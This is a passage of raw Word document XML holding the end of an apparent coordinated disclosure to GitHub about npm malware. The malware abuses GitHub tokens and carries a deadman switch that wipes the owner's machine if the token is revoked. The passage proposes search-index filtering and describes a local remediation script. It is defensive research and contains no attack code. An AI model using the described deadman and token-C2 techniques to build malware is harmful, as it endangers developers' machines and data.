        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">IfYouRevokeThisTokenItWillWipeTheComputerOfTheOwner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Malware instances would continue committing data successfully (no 4xx triggered), but the attacker's automated search queries would return zero results. This silently severs their ability to retrieve any stolen data — from current victims and all future infections simultaneously — without alerting the attacker that their infrastructure has been disrupted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Attached Remediation Script</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The attached shaihuld-remediate.sh script is designed for both proactive and reactive use:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Solo mode (no arguments): scans, defuses, immunizes, and writes a local IR report. Nothing is transmitted externally.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Coordinated mode (--revoke-endpoint=URL): additionally sends a clean-status signal after confirming the threat is gone, enabling the safe revocation flow described above.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Silent/CI mode (--silent): suppresses stdout for scripted deployment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Exit codes are machine-readable: 0 = clean/immunized, 2 = threat found and neutralized.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The script intentionally does not transmit stolen credentials to any server. The local IR report saved to ~/.local/share/ir-reports/ can be shared with your security team or attached to a follow-up report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Recommended Immediate Actions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement search index filter for the beacon string (Phase 4) — this is low-risk and can be deployed immediately without coordination with victims.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Review GitHub's token revocation infrastructure for the feasibility of a 'zombie' / tarpit state for tokens flagged as potentially held by deadman-switch malware.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Publish a GitHub Security Advisory for the known malicious package name(s) so the npm registry can act.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Consider adding a warning to the GitHub token settings page when a token has been used from an unusual number of IPs or has exhibited C2-like polling patterns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Researcher Notes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This disclosure is made in good faith under coordinated responsible disclosure principles. No stolen credentials were exfiltrated during research. All IOCs were derived from static and dynamic analysis of the malware. The remediation script and UI dashboard are being released as open-source defensive tooling regardless of whether GitHub implements the zombie token protocol — the script functions safely as a standalone local tool.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">I am happy to provide additional technical detail, sample payloads (redacted), or live demonstration in a controlled environment at GitHub's request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Submitted via: security@github.com and https://github.com/security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2026-05-13T09:51:57.307Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-13T09:51:57.307Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>